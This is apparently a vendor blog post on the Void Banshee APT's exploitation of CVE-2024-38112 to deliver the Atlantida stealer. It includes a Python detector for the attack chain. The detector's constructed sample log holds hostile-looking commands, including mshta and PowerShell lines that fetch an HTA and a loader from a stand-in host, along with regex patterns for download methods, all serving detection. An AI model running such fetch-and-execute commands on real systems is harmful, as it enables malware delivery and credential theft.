Following Microsoft’s recent Patch Tuesday update, which addressed the CVE-2024-38112 vulnerability, researchers uncovered a sophisticated campaign by the Void Banshee APT. This campaign exploits a security gap in the Microsoft MHTML browser engine through zero-day attacks to deploy the Atlantida stealer on victims’ devices.
Detecting CVE-2024-38112 Exploitation by Void Banshee
In the first half of 2024, advanced persistent threat groups from diverse regions such as China, North Korea, Iran, and russia unveiled advanced and innovative offensive techniques, significantly escalating the global threat landscape. Amid rising geopolitical tensions in recent years, the threat posed by APTs has surged, becoming one of the foremost concerns for cybersecurity experts. These sophisticated adversaries leverage zero-day vulnerabilities, spear-phishing campaigns, and state-of-the-art malware to infiltrate critical infrastructure, financial systems, and government networks, underscoring the urgent need for enhanced defensive measures and international collaboration in cybersecurity.
The newly revealed Void Banshee campaign exploits a flaw that has already been patched, which means cyber defenders must stay on constant guard against emerging threats even after updates ship. To boost threat investigation and help security teams identify cyber-attacks linked to the Void Banshee campaign in the limelight, SOC Prime Platform for collective cyber defense offers a set of curated Sigma rules.
Press the Explore Detections button below and immediately drill down to an extensive rule set addressing the Void Banshee APT attacks exploiting CVE-2024-38112.
All the rules are compatible with 30+ SIEM, EDR, and Data Lake solutions while being mapped to the MITRE ATT&CK framework to smooth out threat detection & hunting procedures. Additionally, every rule is enriched with detailed metadata, including CTI references, attack timelines, and triage recommendations.
Void Banshee Attack Analysis: Exploiting CVE-2024-38112 for Malware Delivery
The most recent research by Trend Micro shed light on the Void Banshee operation utilizing CVE-2024-38112 exploits to deliver the Atlantida stealer onto Windows devices. The campaign, first spotted in May 2024, involves a multi-stage attack chain that relies on the flaw to access and execute malicious files through the disabled Internet Explorer (IE) browser via specially crafted internet shortcut (URL) files.
Specifically, adversaries abuse .URL files and Microsoft protocol handlers and URI schemes, including the MHTML protocol, to reach the system-disabled IE browser and thereby target Windows 10 and Windows 11 users. This campaign highlights how outdated Windows components such as Internet Explorer, despite being considered obsolete, remain a significant attack vector for malware. Interestingly, Trend Micro’s findings overlap with a report by Check Point, which identified similar .URL files linked to the campaign as early as January 2023.
The infection process usually begins with phishing emails featuring links to ZIP files on file-sharing platforms. These ZIP files house .URL files that exploit CVE-2024-38112, deceiving victims into accessing a compromised webpage with a malicious HTML Application (HTA). When the HTA file is opened, it runs a VBS script, which then launches a PowerShell script to fetch a .NET loader. This loader operates within the RegAsm.exe process, ultimately deploying the Atlantida stealer.
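The staged chain described above (IE launched through the MHTML handler, then HTA, VBS, PowerShell and finally a loader inside RegAsm.exe) lends itself to parent-child process correlation. The following Python is an added example written for this post, not one of SOC Prime's Sigma rules and not code from the Trend Micro report: it parses constructed process-creation events in an assumed key=value layout (the field names `host`, `pid`, `ppid`, `image`, `cmdline` and the sample values are all invented for the demo), classifies each event into one of the chain's stages, and walks the ancestry of every RegAsm.exe launch to report how many of the stages are present. The host `WS02` line is a benign PowerShell invocation included to show that a lone PowerShell process is not flagged.

```python
"""Heuristic detector for the CVE-2024-38112 / Void Banshee style attack chain.

Added example. Log format, field names and every sample value are constructed
assumptions; adapt the parser to your SIEM's process-creation schema.
"""
import re
from typing import Dict, List, Optional

# Constructed process-creation events (NOT real telemetry). Backslashes are
# doubled because this is a normal Python string literal.
SAMPLE_LOG = """\
ts=2024-07-10T09:12:01Z host=WS01 pid=3002 ppid=1 image="C:\\Windows\\explorer.exe" cmdline="explorer.exe"
ts=2024-07-10T09:12:03Z host=WS01 pid=4188 ppid=3002 image="C:\\Program Files\\Internet Explorer\\iexplore.exe" cmdline="iexplore.exe mhtml:http://files.example.invalid/invoice.pdf"
ts=2024-07-10T09:12:05Z host=WS01 pid=4210 ppid=4188 image="C:\\Windows\\System32\\mshta.exe" cmdline="mshta.exe http://files.example.invalid/invoice.hta"
ts=2024-07-10T09:12:06Z host=WS01 pid=4230 ppid=4210 image="C:\\Windows\\System32\\wscript.exe" cmdline="wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\stage.vbs"
ts=2024-07-10T09:12:07Z host=WS01 pid=4244 ppid=4230 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe -c Invoke-WebRequest http://files.example.invalid/loader.bin"
ts=2024-07-10T09:12:09Z host=WS01 pid=4260 ppid=4244 image="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" cmdline="RegAsm.exe"
ts=2024-07-10T10:00:00Z host=WS02 pid=5100 ppid=1 image="C:\\Windows\\explorer.exe" cmdline="explorer.exe"
ts=2024-07-10T10:00:02Z host=WS02 pid=5120 ppid=5100 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe Get-Date"
"""

# key=value pairs; values containing spaces are double-quoted (assumed layout).
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Ordered stages of the chain: (stage name, image regex, optional cmdline regex).
STAGES = [
    ("ie_mhtml_handler", r"iexplore\.exe$", r"\bmhtml:"),
    ("hta_execution", r"mshta\.exe$", None),
    ("vbs_execution", r"[wc]script\.exe$", r"\.vbs\b"),
    ("powershell_download", r"powershell\.exe$", r"invoke-webrequest|downloadstring|downloadfile|https?://"),
    ("regasm_loader", r"regasm\.exe$", None),
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value log line into a dict."""
    return {k: (q if q else b) for k, q, b in KV_RE.findall(line)}


def classify(ev: Dict[str, str]) -> Optional[str]:
    """Return the chain stage an event matches, or None."""
    image, cmd = ev.get("image", ""), ev.get("cmdline", "")
    for name, img_re, cmd_re in STAGES:
        if re.search(img_re, image, re.I) and (cmd_re is None or re.search(cmd_re, cmd, re.I)):
            return name
    return None


def detect(log_text: str, min_stages: int = 3) -> Dict[str, List[Dict]]:
    """Report standalone MHTML-handler IE launches and full chains ending in RegAsm.exe."""
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    by_key = {(e["host"], e["pid"]): e for e in events}
    mhtml_launches = [e for e in events if classify(e) == "ie_mhtml_handler"]
    chains = []
    for ev in events:
        if classify(ev) != "regasm_loader":
            continue
        seen: List[str] = []
        cur: Optional[Dict[str, str]] = ev
        for _ in range(16):  # bounded ancestry walk; guards against ppid cycles
            if cur is None:
                break
            stage = classify(cur)
            if stage and stage not in seen:
                seen.append(stage)
            cur = by_key.get((cur["host"], cur["ppid"]))
        seen.reverse()  # oldest ancestor first
        if "ie_mhtml_handler" in seen and len(seen) >= min_stages:
            chains.append({"host": ev["host"], "regasm_pid": ev["pid"], "stages": seen})
    return {"mhtml_launches": mhtml_launches, "chains": chains}


if __name__ == "__main__":
    for chain in detect(SAMPLE_LOG)["chains"]:
        print(f"{chain['host']}: RegAsm pid {chain['regasm_pid']} via {' -> '.join(chain['stages'])}")
```

The standalone `mhtml_launches` list is the early-warning signal: an `iexplore.exe` process started with an `mhtml:` argument on a host where IE is supposed to be disabled deserves triage on its own, while a chain that reaches RegAsm.exe through three or more stages is a high-confidence hit. The cmdline keywords for the PowerShell stage are deliberately narrow so that routine administrative PowerShell, like the `WS02` event, does not trip the rule.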
Even after Microsoft’s Patch Tuesday update resolved CVE-2024-38112, attackers persisted in their malicious activities. The vulnerability, attributed to a spoofing issue in the MSHTML browser engine of the now-defunct Internet Explorer, was addressed in the latest patch. Despite Internet Explorer’s support ending on June 15, 2022, and its official deactivation in Windows 11 and newer Windows 10 versions, attackers have exploited remnants of the browser still present on systems. The gravity of this threat became evident when Microsoft’s July update acknowledged ongoing exploitation, prompting CISA to add the flaw to the Known Exploited Vulnerabilities (KEV) catalog with a 21-day remediation requirement for all US federal agencies.
Void Banshee APT mostly concentrates its efforts on victims across the US, Asia, and Europe, with most of its attacks focused on disseminating the Atlantida stealer, which aims to steal sensitive data and credentials from various applications, including web browsers.
Given the escalating threat posed by APT actors globally, and given that attackers are able to promptly weaponize the latest vulnerabilities for further attacks, security professionals require advanced threat detection and hunting tools to identify potential intrusions as early as possible. Rely on SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting & Detection Stack Validation to identify and address cyber defense blind spots in a timely manner, proactively hunt for emerging threats, and prioritize detection efforts, ensuring you stay one step ahead of attackers.